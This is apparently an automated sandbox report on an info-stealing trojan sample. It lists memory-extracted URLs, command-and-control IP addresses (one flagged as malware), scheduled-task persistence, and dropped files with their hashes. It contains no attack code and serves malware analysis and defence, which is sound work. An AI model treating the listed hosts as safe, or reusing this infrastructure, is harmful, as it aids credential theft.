http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | svchost.exe, 0000001D.00000003.492894441.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492948923.0000019DDF70F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493224979.0000019DDF70F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492751417.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493183526.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.645771759.0000019DDF710000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493137367.0000019DDF710000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492868247.0000019DDF710000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.645547709.0000019DDF702000.00000004.00000001.sdmp | false | - | high
https://account.live.com/InlineSignup.aspx?iww=1&id=80502 | svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp | false | - | high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1ctLMEM | A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmp | false | - | high
https://login.liUTF-16p | svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0) | A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmp | false | - | high
https://signup.live.com/signup.aspx | svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp | false | - | high
https://login.live | svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://185.163.204.24/F | A7F0.exe, 0000001F.00000002.663539364.00000000051D4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.msn.com/?ocid=iehpy | A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmp | false | - | high
https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601 | svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmp | false | - | high
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000002.00000000.374781683.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.362338690.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.391269138.000000000095C000.00000004.00000020.sdmp | false | - | high
https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600 | svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmp | false | - | high
https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603 | svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp | false | - | high
https://api.ip.sb/ip | 3F71.exe, 0000000D.00000002.509652789.00000000035F1000.00000004.00000001.sdmp, 3F71.exe, 0000001C.00000000.502914721.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
http://185.163.204.24/B | A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2004/09/policy | svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp | false | - | high
https://account.live.com/InlineSignup.aspx?iww=1&amp;id=80502 | svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp | false | - | high
https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605 | svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp | false | - | high
https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604 | svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmp | false | - | high
https://account.live.com/msangcwam | svchost.exe, 0000001D.00000003.491865995.0000019DDF777000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumerate | svchost.exe, 0000001E.00000002.645438848.00000232420AA000.00000004.00000001.sdmp | false | - | high
https://login.live.c | svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://185.163.204.24/0 | A7F0.exe, 0000001F.00000002.663447293.00000000051C0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.ver) | svchost.exe, 0000001E.00000002.650780980.0000023247887000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://passport.net/tb | svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmp | false | - | unknown
https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0LMEM | A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmp | false | - | high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g | A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmp | false | - | high
http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/74acab80c259fbd3afe9b19dbd62861e1ddfe5b841 | A7F0.exe, 0000001F.00000002.663447293.00000000051C0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://185.163.204.24/as | A7F0.exe, 0000001F.00000002.663539364.00000000051D4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue | svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.643865558.0000019DDEEBD000.00000004.00000001.sdmp | false | - | high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736 | A7F0.exe, 0000001F.00000002.663949745.0000000005218000.00000004.00000001.sdmp | false | - | high
https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0 | A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmp | false | - | high
https://account.live.com/Wizard/Password/Change?id=80601 | svchost.exe, 0000001D.00000002.644053922.0000019DDEF02000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642197758.0000019DDEE41000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491882830.0000019DDF751000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.491831144.0000019DDF72E000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/02/sc | svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp | false | - | high
https://185.163.204.22/capibar | A7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmp | true | Avira URL Cloud: malware | unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80601 | svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp | false | - | high
https://account.live.com/inlinesignup.aspx?iww=1&id=80600 | svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp | false | - | high
https://logilive.c | svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue | svchost.exe, 0000001D.00000002.643514399.0000019DDEEAE000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp | false | - | high
http://178.62.113.205/capibar | A7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80605 | svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmp | false | - | high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsecuri | svchost.exe, 0000001D.00000002.645870080.0000019DDF713000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/02/trustp | svchost.exe, 0000001D.00000002.646484115.0000019DDF737000.00000004.00000001.sdmp | false | - | high
https://account.live.com/inlinesignup.aspx?iww=1&id=80603 | svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp | false | - | high
https://account.live.com/inlinesignup.aspx?iww=1&id=80604 | svchost.exe, 0000001D.00000003.492079356.0000019DDF74D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.642556430.0000019DDEE5B000.00000004.00000001.sdmp | false | - | high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=18 | A7F0.exe, 0000001F.00000002.663713734.00000000051F9000.00000004.00000001.sdmp | false | - | high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd | svchost.exe, 0000001D.00000003.492894441.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492948923.0000019DDF70F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493224979.0000019DDF70F000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492751417.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493183526.0000019DDF70E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.645771759.0000019DDF710000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.493137367.0000019DDF710000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.492868247.0000019DDF710000.00000004.00000001.sdmp | false | - | high

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.163.45.70 | unknown | Moldova Republic of | 39798 | MIVOCLOUDMD | false
40.93.207.0 | microsoft-com.mail.protection.outlook.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
94.142.143.116 | patmushta.info | Russian Federation | 35196 | IHOR-ASRU | false
185.215.113.35 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
188.166.28.199 | unknown | Netherlands | 14061 | DIGITALOCEAN-ASNUS | true
86.107.197.138 | unknown | Romania | 39855 | MOD-EUNL | false
8.209.70.0 | host-data-coin-11.com | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false
54.38.220.85 | unicupload.top | France | 16276 | OVHFR | false
162.159.135.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false
104.21.38.221 | goo.su | United States | 13335 | CLOUDFLARENETUS | false
144.76.136.153 | transfer.sh | Germany | 24940 | HETZNER-ASDE | false
185.233.81.115 | unknown | Russian Federation | 50113 | SUPERSERVERSDATACENTERRU | true
185.7.214.171 | unknown | France | 42652 | DELUNETDE | true
185.186.142.166 | unknown | Russian Federation | 204490 | ASKONTELRU | true
141.8.194.74 | a0621298.xsph.ru | Russian Federation | 35278 | SPRINTHOSTRU | false
185.163.204.22 | unknown | Germany | 20771 | CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE | false
185.163.204.24 | unknown | Germany | 20771 | CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE | false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 553117
Start date: 14.01.2022
Start time: 10:42:04
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 16m 2s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: zmbGUZTICp.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 48
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@61/51@81/19
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 19.1% (good quality ratio 13.1%)
• Quality average: 51.7%
• Quality standard deviation: 40.5%
HCA Information:
• Successful, ratio: 56%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• TCP packets have been reduced to 100
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 13.89.179.12, 23.211.4.86
• Excluded domains from analysis (whitelisted): fs.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, microsoft.com, watson.telemetry.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing behavior and disassembly information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size exceeded maximum capacity and may have missing network information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
10:43:45 | Task Scheduler | Run new task: Firefox Default Browser Agent EA345A35CCA4E184 path: C:\Users\user\AppData\Roaming\gdrgbdj
10:43:55 | API Interceptor | 1x Sleep call for process: 2DB3.exe modified
10:44:13 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
10:44:22 | API Interceptor | 3x Sleep call for process: svchost.exe modified
10:44:44 | API Interceptor | 4x Sleep call for process: A7F0.exe modified
10:44:46 | API Interceptor | 464x Sleep call for process: mjlooy.exe modified
10:44:48 | Task Scheduler | Run new task: mjlooy.exe path: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log
Process: C:\Windows\System32\svchost.exe
File Type: MPEG-4 LOAS
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.2485928694932566
Encrypted: false
SSDEEP: 1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU45:BJiRdwfu2SRU45
MD5: 46301C913F59052C24F89BB61C076A86
SHA1: 280D65E7DD5758F8E3A6C48C41E32B6D0AA4C53F
SHA-256: 8A752E2055C6F60317E892892F41DF560209FE83C82A8EBE85AD5A82FB3F15B7
SHA-512: 2DEA2312E30258ABD94606A4BBB1C5CBF0819C4CF4AA2AE98225AFD924E64406923D915ECED6F62BDD08499A1F8EA479432EE8D0FA243F2ECF9162E658910DB3
Malicious: false
Reputation: unknown
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage user DataBase, version 0x620, checksum 0x2d162e1b, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 786432
Entropy (8bit): 0.2506815554351528
Encrypted: false
SSDEEP: 384:lbW+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:lbZSB2nSB2RSjlK/+mLesOj1J2
MD5: 5E8CDCD58254AD3AA7C14A73154B3277
SHA1: 9E9C44202300E3B618537D4D692360D57052A478
SHA-256: 6D19EF4AD21115659FEB89AB15A4CC3C26E5DBE468A568B2908A2B95AB552345
SHA-512: 6B45638E58215FDBF208547170B3DE276BCA26C78415874AAAEA5BEA56507B18529515AD47D36A876B12149FFC9BD5F9154A671BAD5A4C252C1B15DC29703B74
Malicious: false
Reputation: unknown
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.07555221228914681
Encrypted: false
SSDEEP: 3:sX1EvyJAq+l/bJdAtiXn6kqyll3Vkttlmlnl:sAyuq+t4Lkq23
MD5: C7CCFBC9E369C73F4A1268BEC8B124FA
SHA1: F665B2B40E0561EE864D90A3D4F80E86324B5D6A
SHA-256: 64230019D1737CAFA29C4DF8DFCF1EFB8FE98851FEBEE83F490EF18F9E5FAF2D
SHA-512: EF37F0AB3ABD2CF8DF0F66F4FDE4C0F729044CDD7E0829F0BA42FCD409365A7CE6F17A77CB5F90AFD33F70C612EA82D3DD7374D0E5603F5F766D07D487110B2A
Malicious: false
Reputation: unknown
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1E7F.exe_56ef6c3f939a5c31c54ae423594576eccb36d7e_39743ca4_173f7c90\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.8147334084221176
Encrypted: false
SSDEEP: 96:j+F+XLkopwOQoJ7R3V6tpXIQcQec6tycEfcw3m+HbHg/8BRTf3o8Fa9iVfOyWYmp:qckoJ8HQ0lbjIq/u7srS274ItvS
MD5: 0649ECAD777C02E54262EF3EB90CCED8
SHA1: 5E75E6699F03B849535D31A1A09A0F3497C86D7B
SHA-256: 85BA251E129D34788335425E83C40F0B5008954FAFF5A28F0E4CEA178D0737BF
SHA-512: 79B833B2EFB512A790883AF7B7F5DEEC4029A1D3FDBD099FC6FD8E4E51D3584DA139E4633BA69FEFCFA8076C88AE31177E06AF9B5F3D4360772BFF716705CD6F
Malicious: false
Reputation: unknown
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4E1E.tmp.dmp
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 14 streams, Fri Jan 14 18:44:02 2022, 0x1205a4 type
Category: dropped
Size (bytes): 42152
Entropy (8bit): 2.0070556637522814
Encrypted: false
SSDEEP: 192:9+01WMNuYFYdOeh0k1ZU/z3gtgcoegRtT2t9sL2ChH1X:pNh6QefOjwzAx1X
MD5: 316DB5CFD39AB644814F89500F3C9906
SHA1: 66A84F4A0D70C0DB0D93DC88D01CB7DB183612F7
SHA-256: B89B7C2A0A6ECF23AFA9F25E045FF95F078F13F8581664FB63FAB4ABB2F1FCA6
SHA-512: 5D786B587A11E11BFD7D4538D0C815664BF8136E06C9F411C9F563CB31EDED963757FBDCFD54A003C6CC8DCA2C5EBE964207AD6788D2C2E2ABC8213B909F5296
Malicious: false
Reputation: unknown
                                                                                                                                                    Preview:
                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER5581.tmp.WERInternalMetadata.xml
                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):8390
                                                                                                                                                    Entropy (8bit):3.702157392275921
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:Rrl7r3GLNire6F6YJfSUjgmfqRSUCpDi89b23sfdym:RrlsNiC6F6YhSUjgmfqRSf28fZ
                                                                                                                                                    MD5:68B45BFA81BD5DDCCE22105ACE357023
                                                                                                                                                    SHA1:F8518BF4AC336C8189438B8FF8DFACAD2867A272
                                                                                                                                                    SHA-256:7A3BDCE83450471DAADB0BE59262D65E518AC8B3A31C6289846522CCBBB0C300
                                                                                                                                                    SHA-512:30C650628A38511C711E5DA5C1979A31325B52F6E478AFE0D574874561A63DC7C217615B62255B7D00A55D38227A24468164D0113BC04D02E55BE825E264E21A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:
                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER59A9.tmp.xml
                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4685
                                                                                                                                                    Entropy (8bit):4.480309088097584
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:cvIwSD8zskJgtWI9oaEYWSC8BQ8fm8M4JN8qFthlco+q8v981juLiAd:uITfifaERSNnJfnKAuLiAd
                                                                                                                                                    MD5:FF921EB2F3095E2BB781CB4894F054C4
                                                                                                                                                    SHA1:53BB32657077BCC58DBA8B5554DE9558041C2110
                                                                                                                                                    SHA-256:DD601D81852C59F193A8E0FD702813BD11727BB49E38C1DE94CF94BF80C4BA56
                                                                                                                                                    SHA-512:DB05E9D5B1E65C9FD7CDA725F54F48AD57B35799325CEE9BA8DC852256AC2C802AA2C853EF0E7E327DBC414F8C3FDDBFD2D52305532E3AD69AA62AC4EA343E5C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:
                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER6219.tmp.csv
                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):48344
                                                                                                                                                    Entropy (8bit):3.066109567350114
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:/fHX382gE2hsUrLYKARAkNkiUQIyzU9XMPvw0:/fHX382CsUrLYKARAskihNU9XMPvw0
                                                                                                                                                    MD5:54C5FA9810320E84420B5B29103D744D
                                                                                                                                                    SHA1:6CE46C334A0FCB0C036BCD6C987CA01674896471
                                                                                                                                                    SHA-256:07C0E122791672016203522FCF355B2D35C74777E35EB16B8C09A117A6010B28
                                                                                                                                                    SHA-512:3F50E4D84BE8DF612BBA7F15DBFB2658ACB83A20547A0BAB93D5F7476769E4008C320E994C297487AD49F896A2129E6F9F2759CE4C3CEDB4A12657FB6C163432
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:
                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER66CE.tmp.txt
                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13340
                                                                                                                                                    Entropy (8bit):2.69536143503136
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:9GiZYWK5aBkdY1Y6W/5H6YEZ7FtBt8i0Tj0/w6UA1kaObMaz8IOq3:9jZDKxiVtZUmkaObMaz7Oq3
                                                                                                                                                    MD5:E5DAA55DFDF64E4FD828D86A427F34A8
                                                                                                                                                    SHA1:A1743376D125D03351D754B114121A79696341EC
                                                                                                                                                    SHA-256:DDFB1CDEA7F63C7808AA474F23F299F6CD0189E80695D0C0F7D0B87BE293C3A5
                                                                                                                                                    SHA-512:FBB6388AAE297315408093BC303D0A87ED52FBBE20F8911FEAA7DE77AD6ADC39CF65D28A534DB34DA4D4D3F70B0F60E3D4C03AF58E2C3D5D6A2206FF559A6550
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:
                                                                                                                                                    C:\Users\user\AppData\LocalLow\1xVPfvJcrg
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):73728
                                                                                                                                                    Entropy (8bit):1.1874185457069584
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:
                                                                                                                                                    C:\Users\user\AppData\LocalLow\RYwTiizs2t
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):73728
                                                                                                                                                    Entropy (8bit):1.1874185457069584
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:
                                                                                                                                                    C:\Users\user\AppData\LocalLow\frAQBc8Wsa
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):40960
                                                                                                                                                    Entropy (8bit):0.792852251086831
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                    MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                    SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                    SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                    SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:
                                                                                                                                                    C:\Users\user\AppData\LocalLow\rQF69AzBla
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):20480
                                                                                                                                                    Entropy (8bit):0.6951152985249047
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
                                                                                                                                                    MD5:EA7F9615D77815B5FFF7C15179C6C560
                                                                                                                                                    SHA1:3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
                                                                                                                                                    SHA-256:A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
                                                                                                                                                    SHA-512:9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:
C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dll
Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):123344
Entropy (8bit):6.504957642040826
Encrypted:false
SSDEEP:1536:DkO/6RZFrpiS7ewflNGa35iOrjmwWTYP1KxBxZJByEJMBrsuLeLsWxcdaocACs0K:biRZFdBiussQ1MBjq2aocts03/7FE
MD5:F92586E9CC1F12223B7EEB1A8CD4323C
SHA1:F5EB4AB2508F27613F4D85D798FA793BB0BD04B0
SHA-256:A1A2BB03A7CFCEA8944845A8FC12974482F44B44FD20BE73298FFD630F65D8D0
